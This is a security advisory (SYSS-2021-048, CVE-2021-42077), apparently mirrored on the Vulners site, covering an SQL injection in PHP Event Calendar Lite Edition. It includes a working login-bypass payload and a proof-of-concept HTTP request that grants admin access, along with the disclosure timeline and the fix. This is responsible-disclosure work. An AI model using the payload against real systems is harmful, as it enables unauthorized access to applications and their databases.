Vulners
Lucene search
PHP Event Calendar Lite Edition SQL Injection
🗓️ 05 Nov 2021 00:00:00Reported by Erik SteltznerType 
packetstorm🔗 packetstormsecurity.com👁 529 Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | PHP Event Calendar Lite Edition SQL Injection Vulnerability | 6 Nov 202100:00 | – | zdt |
 | CVE-2021-42077 | 8 Nov 202107:28 | – | circl |
 | PHP Event Calendar SQL注入漏洞 | 5 Nov 202100:00 | – | cnnvd |
 | PHP Event Calendar Lite Edition is vulnerable to SQL injection | 10 Nov 202100:00 | – | cnvd |
 | PHP Event Calendar SQL Injection (CVE-2021-42077) | 28 Nov 202100:00 | – | checkpoint_advisories |
 | CVE-2021-42077 | 8 Nov 202104:01 | – | cve |
 | CVE-2021-42077 | 8 Nov 202104:01 | – | cvelist |
 | EUVD-2021-29063 | 3 Oct 202520:07 | – | euvd |
 | CVE-2021-42077 | 8 Nov 202104:15 | – | nvd |
 | Sql injection | 8 Nov 202104:15 | – | prion |
10
`Advisory ID: SYSS-2021-048
Product: PHP Event Calendar
Manufacturer: Kayson Group Ltd.
Affected Version(s): PHP Event Calendar Lite edition
Tested Version(s): PHP Event Calendar Lite edition
Vulnerability Type: SQL injection (CWE-89)
Risk Level: High
Solution Status: Closed
Manufacturer Notification: 2021-08-09
Solution Date: 2021-09-03
Public Disclosure: 2021-11-04
CVE Reference: CVE-2021-42077
Authors of Advisory: Erik Steltzner, SySS GmbH
Maurizio Ruchay, SySS GmbH
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
PHP Event Calendar is a multi-user web application designed
to manage and publish calendar events.
The manufacturer describes the product as follows (see [1] and [2]):
"PHP Event Calendar features day, week, month, year, agenda, and
resource views. It includes built-in reminder support so you can
deliver full-featured event scheduling management systems in
the shortest possible time."
"PHP Event Calendar is a out-of-box web calendar/scheduler solution.
It will run on web servers that support PHP 5.3 and higher."
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
Due to improper validation, the application is vulnerable to SQL injection
attacks. For example, the following SQL statement can be used as a
username during the login process to bypass the authentication:
' OR '1' = '1' #
This vulnerability cannot only be exploited to bypass the login.
It can also be used to execute SQL statements directly on the database,
allowing an adversary in some cases to completely compromise the
database system.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
The following request shows how it is possible for an adversary to bypass
the login mask with the SQL statement "' OR '1' = '1' #":
~~~
Request:
POST /server/ajax/user_manager.php HTTP/1.1
Host: <rhost>
[...snip...]
username='+OR+'1'+%3D+'1'+%23&password=password
Response:
HTTP/1.1 200 OK
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxxx
[...snip...]
Connection: close
success#Welcome ' OR '1' = '1' #
~~~
The web application accepts the request and the adversary is now logged
in into the app with admin privileges.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
Update to a recent version of PHP Event Calendar.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2021-07-29: Vulnerability discovered
2021-08-09: Vulnerability reported to manufacturer
2021-09-03: Patch released by manufacturer
2021-11-04: Public disclosure of vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Product Website for PHP Event Calendar
https://phpeventcalendar.com/
[2] Documentation Website for PHP Event Calendar
https://phpeventcalendar.com/documentation/
[3] SySS Security Advisory SYSS-2021-048
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-048.txt
[4] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/
[5] PHP Prepared Statements:
https://www.php.net/manual/de/mysqli.quickstart.prepared-statements.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:
This security vulnerability was found by Erik Steltzner and
Maurizio Ruchay of SySS GmbH.
E-Mail: [email protected]
Public Key:
https://www.syss.de/fileadmin/dokumente/PGPKeys/Erik_Steltzner.asc
Key ID: 0x4C7979CE53163268
Key Fingerprint: 6538 8216 555B FBE7 1E01 7FBD 4C79 79CE 5316 3268
E-Mail: [email protected]
Public Key:
https://www.syss.de/fileadmin/dokumente/PGPKeys/Maurizio_Ruchay.asc
Key ID: 0xC7D20E267F0FA978
Key Fingerprint: D506 AB5A FE3E 09AE FFBE DEB2 C7D2 0E26 7F0F A978
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Nov 2021 00:00Current
9.2High risk
Vulners AI Score9.2
EPSS0.00754